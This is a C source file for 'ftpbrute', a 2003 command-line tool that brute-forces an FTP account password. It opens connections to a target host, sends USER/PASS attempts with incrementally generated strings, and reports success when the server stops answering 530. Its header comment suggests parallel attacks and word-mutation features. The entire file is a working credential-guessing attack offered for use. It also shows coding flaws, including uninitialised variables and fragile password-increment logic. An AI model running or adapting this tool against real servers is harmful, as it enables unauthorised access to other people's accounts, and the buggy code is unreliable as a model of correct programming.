/*
 *	ftpbrute.c
 *
 *	Use brute force to find an FTP password.
 *	
 *	Whilst using a dictionary file for password suggestions is a very effective
 *	tactic, many more clued up users/providers are using random character
 *	strings by default these days. This program just generates random strings
 *	and tests them one after another.
 *
 *	Potential improvements:
 *
 *	  o Multi-threading? This might cause socket trouble, but it would speed
 *	    this very slow process up immensely to attack in parallel. This could
 *		come across as a DOS attack though, nicer would be some kind of speed
 *		control. Perhaps a thread-count option and a delay factor, or even
 *		random distribution of attack attempts.
 *
 *	  o If a start word is supplied then variants of that word should be
 *	  	attempted. E.g. case variations, common mistakes (1 for l, etc),
 *		adding or subtracting characters at all locations in the string and
 *		more.
 *
 *	  o Addition of other protocols, perhaps config files that describe how
 *		passwords are exchanged in a given protocol. That way more can be added
 *		and old ones updated easily.
 *
 *	Afternoon <noon at aftnn.org>, 2003
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

int conn(char* h) {
	int s;
	struct sockaddr_in sin;
	struct servent* sp;
	struct hostent* hp;

	fflush(stdout);

	if (!(sp = getservbyname("ftp", "tcp")) || !(hp = gethostbyname(h))) {
		printf("%s is not a valid host address (error %d).\n", h, errno);
		exit(2);
	}

	sin.sin_family = AF_INET;
	bcopy(hp->h_addr, (char*)&sin.sin_addr, hp->h_length);
	sin.sin_port = sp->s_port;

	if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
		printf("Unable to create socket (error %d).\n", errno);
		exit(3);
	}

	if (connect(s, (struct sockaddr*)&sin, sizeof(sin))) {
		printf("Unable to connect to %s (error %d).\n", h, errno);
		exit(4);
	}
	
	return s;
}

void makepw(char* pw) {
	int i, j;
	int pl = strlen(pw) - 1;
	int nextinc = 0;

	if (!strcmp(pw, "")) pw = strcat(pw, "!");
	else if (pw[pl] == '~') {
		for (i = 0; i <= pl; i++) {
			if (pw[pl - i] == '~') {
				pw[pl - i] = '!';
				nextinc = 1;
				if (!(pl - i)) pw = strcat(pw, "!");
			}
			else if (nextinc && (pl - i)) {
				pw[pl - i]++;
				nextinc = 0;
			}
		}
	}
	else pw[pl]++;
}

int main(int argc, char* argv[]) {
	int s, att, count;

	const int bufsize = 80;
	char buf[bufsize];
	FILE *si, *so;

	char pw[16];
	
	if (argc < 3) {
		puts("Usage: ftpbrute host username [startword]");
		exit(1);
	}

	if (argc > 3) strncpy(pw, argv[3], 16); 

	puts("This could take hours and hours...");

	while (1) {
		if (!att) {
			close(s);
			s = conn(argv[1]);
			si = fdopen(s, "r");
			so = fdopen(s, "w");
		}

		makepw(pw);
		
		// chomp banner
		if (att == 0) fgets(buf, bufsize, si);

		fprintf(so, "USER %s\r\n", argv[2]);
		fflush(so);

		fgets(buf, bufsize, si);

		fprintf(so, "PASS %s\r\n", pw);
		fflush(so);

		fgets(buf, bufsize, si);

		if (!strstr(buf, "530")) {
			printf("Success! Password is %s\n", pw);
			exit(0);
		}
		else if (argc > 4) printf("Password isn't %s\n", pw);

		if (++att == 3) att = 0;
	}
}